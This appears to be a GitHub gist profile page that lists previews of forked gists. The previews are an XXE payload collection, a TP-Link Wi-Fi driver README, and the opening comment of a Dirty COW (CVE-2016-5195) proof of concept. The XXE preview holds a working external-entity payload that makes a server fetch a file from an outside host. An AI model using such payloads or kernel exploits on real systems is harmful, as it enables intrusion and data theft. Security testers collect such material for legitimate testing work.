Skip to content

Instantly share code, notes, and snippets.

View budi-khoirudin's full-sized avatar

Budi Khoirudin budi-khoirudin

View GitHub Profile
@budi-khoirudin
budi-khoirudin / XXE_payloads
Created January 13, 2021 13:49 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@budi-khoirudin
budi-khoirudin / README.md
Created June 14, 2020 14:21 — forked from electron0zero/README.md
TP-Link AC600 Archer T2U Nano - Ubuntu 18.04 - Info and drivers
/*
* CVE-2016-5195 dirtypoc
*
* This PoC is memory only and doesn't write anything on the filesystem.
* /!\ Beware, it triggers a kernel crash a few minutes.
*
* gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread
*/
#define _GNU_SOURCE